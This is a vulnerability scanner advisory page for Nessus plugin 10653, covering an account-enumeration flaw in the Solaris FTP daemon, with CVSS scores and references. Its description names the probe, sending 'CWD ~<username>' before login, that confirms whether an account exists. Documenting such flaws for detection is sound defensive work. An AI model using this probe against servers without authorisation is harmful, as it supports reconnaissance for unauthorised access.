Solaris FTP Daemon CWD Command Account Enumeration

medium Nessus Plugin ID 10653

Synopsis

The remote FTP server is susceptible to an account enumeration attack.

Description

It is possible to determine the existence of a user on the remote system by issuing the command CWD ~<username>, even before logging in.
An attacker can exploit this flaw to determine the existence of known vulnerable accounts.

Solution

There is no known solution at this time.

Plugin Details

Severity: Medium

ID: 10653

File Name: ftp_sol_check_user.nasl

Version: 1.25

Type: remote

Family: FTP

Published: 4/16/2001

Updated: 1/16/2024

Supported Sensors: Nessus

Risk Information

CVSS Score Rationale: Score from a more in depth analysis done by tenable

CVSS v2

Risk Factor: Medium

Base Score: 5

Temporal Score: 4.3

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS Score Source: manual

CVSS v3

Risk Factor: Medium

Base Score: 5.3

Temporal Score: 4.9

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Temporal Vector: CVSS:3.0/E:U/RL:U/RC:C

Vulnerability Information

Exploit Available: true

Exploit Ease: No exploit is required

Vulnerability Publication Date: 4/11/2001

Reference Information

BID: 2564

Detections

Analytics